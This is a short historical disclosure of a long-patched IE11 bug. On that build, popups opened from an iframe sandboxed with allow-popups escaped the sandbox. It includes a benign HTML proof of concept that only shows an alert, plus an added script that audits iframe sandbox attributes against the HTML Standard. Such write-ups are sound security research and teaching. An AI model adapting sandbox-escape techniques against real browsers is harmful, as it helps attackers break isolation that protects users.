A sandboxed iFrame with only allow-popups should be able to open links in new tabs, but the new window should remain sandboxed. On IE11 Blue build 9412, however, clicking a link from the sandboxed iFrame opened a new window that was completely outside the sandbox — able to run scripts, read cookies, and do everything a normal page can.
<!-- index.html -->
<iframe sandbox="allow-popups" src="sandboxed.html" width="600" height="60"></iframe>
<!-- sandboxed.html -->
I am a fully sandboxed iFrame, however, clicking on
<a href="out_of_sandbox.html" target="_blank">this link</a>
will open a new window out of sandbox!
<!-- out_of_sandbox.html: verifies the sandbox state -->
<h1>
<div id="wrong">Oppss! It seems I am still sandboxed. Please, close this window and retry.</div>
</h1>
<script>
document.getElementById("wrong").innerText = "This window got rid of the sandbox!";
alert("Wow! I'm running scripts because I'm completely out of the sandbox!");
</script>
If the new window is still sandboxed, the script tag won’t run and the “still sandboxed” message remains. When the bug is present, the script runs and the message updates — confirming the sandbox was shed. Tested on IE11 Blue Build 9412.
Found during my years at Microsoft (2006–2014). These bugs were patched long ago — shared here as a historical record for learning purposes.
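As an added example (not code from the original post), the script below encodes what the current HTML Standard expects of a popup opened from a sandboxed frame, the rule this IE11 build broke, and applies it to the index.html markup above. The helper names and the second and third sample frames are assumptions made for illustration.

```javascript
// Added example: expected sandbox state of a popup opened from a sandboxed
// iframe, per the current HTML Standard. popupExpectation() and
// auditIframes() are hypothetical helper names, not part of any library.

function popupExpectation(sandboxAttr) {
  // The attribute is a set of space-separated, ASCII case-insensitive tokens.
  const tokens = new Set(
    sandboxAttr.toLowerCase().split(/[ \t\n\f\r]+/).filter(Boolean)
  );
  if (!tokens.has("allow-popups")) {
    return { popup: "blocked" };
  }
  if (tokens.has("allow-popups-to-escape-sandbox")) {
    return { popup: "unsandboxed", scripts: true, opaqueOrigin: false };
  }
  // Default: the new window inherits the opener's sandboxing flags.
  return {
    popup: "inherits-sandbox",
    scripts: tokens.has("allow-scripts"),
    opaqueOrigin: !tokens.has("allow-same-origin"),
  };
}

// Crude regex scan, adequate for simple static markup like index.html above.
function auditIframes(html) {
  const results = [];
  const re =
    /<iframe\b[^>]*?\ssandbox(?![\w-])(?:\s*=\s*(?:"([^"]*)"|'([^']*)'))?[^>]*>/gi;
  for (const m of html.matchAll(re)) {
    const attr = m[1] ?? m[2] ?? ""; // bare `sandbox` applies every restriction
    results.push({ sandbox: attr, ...popupExpectation(attr) });
  }
  return results;
}

// Constructed sample: the first frame is the one from index.html on this page.
const sampleHtml = `
<iframe sandbox="allow-popups" src="sandboxed.html" width="600" height="60"></iframe>
<iframe sandbox="allow-scripts allow-popups allow-popups-to-escape-sandbox" src="ad.html"></iframe>
<iframe sandbox src="locked.html"></iframe>`;

console.log(auditIframes(sampleHtml));
```

For `sandbox="allow-popups"` the expected result is a popup that inherits the sandbox, with scripts disabled and an opaque origin, which is the state out_of_sandbox.html is written to verify.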